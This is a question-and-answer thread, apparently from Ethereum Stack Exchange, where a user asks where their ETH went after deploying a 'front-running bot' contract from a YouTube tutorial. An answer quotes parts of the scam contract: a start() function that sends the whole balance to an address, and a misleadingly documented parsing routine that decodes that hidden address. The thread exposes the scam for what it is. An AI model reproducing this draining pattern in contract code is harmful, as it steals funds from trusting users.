3

I tried following a tutorial on YT and my ETH has been missing. I keep on looking at the tos and froms but I can't seem to find where my ETH has been sent.

This is the created contract address 0x8aa27744A22110AAFB382883E1bbaA3d050D5444

This is the link to the code https://pastebin.com/raw/xZJAM9tK.

Ismael
  • 30,570
  • 21
  • 53
  • 96
RGJ MIA
  • 31
  • 2

2 Answers2

5

If you check that the 'Internal Txns' tab, you will see that your funds were transferred to another contract at: 0xf305382678800d65c8e9c496a4b52a3c8b8a9115

Do you trust that contract? Is this what the contract is supposed to do if you send it ethers? To transfer it to another contract? Could it be a malicious contract?

Check that internal transaction (a transaction that happens from one contract to another) here:

https://etherscan.io/address/0x8aa27744A22110AAFB382883E1bbaA3d050D5444#internaltx

And the balance was sent to this contract:

https://etherscan.io/address/0xf305382678800d65c8e9c496a4b52a3c8b8a9115

If you check the start function, it transfers all the balance of the account to another contract address:

    function start() public payable { 
        emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
        payable(_callFrontRunActionMempool()).transfer(address(this).balance);
    }

Also, this function parseMemoryPool looks suspicious:

    /*
     * @dev Parsing all Uniswap mempool
     * @param self The contract to operate on.
     * @return True if the slice is empty, False otherwise.
     */
    function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }

The docs on it say that it's doing one thing and will return a bool, but it's something else and returning an address. Probably a malicious address hidden in this weird logic to confuse inexperienced people?

So, it seems this may be an attack to steal your funds.

Jeremy Then
  • 4,599
  • 3
  • 5
  • 28
  • 1
    Hi Jeremy. Thanks for looking it up. I did some tinkering and when I saw on the internal txn that it was sent to another address, I knew I got robbed. Charged to experience I guess. T was not a trusted contract though. I was just curious. I'm not really adept to codes and it really did seem okay to laymans since there were words like "return" and "withdraw" Hehe – RGJ MIA Aug 29 '22 at 04:06
  • 1
    When I went to the internal transactions of the contract, there were already a lot of senders there. I'm more curious now. It means I can see where he's going to send all the ETHs he's going to amass right? – RGJ MIA Aug 29 '22 at 04:13
  • Yes. Keep an eye on that contract address to see if he starts sending eth to his personal address or something. Maybe you can report it to the authorities. – Jeremy Then Aug 29 '22 at 12:22
0

Try using Coinpath tool. I pasted the address from your question and tried to trace it https://explorer.bitquery.io/ethereum/smart_contract/0x8aa27744A22110AAFB382883E1bbaA3d050D5444/graph enter image description here

Divyasshree
  • 31
  • 4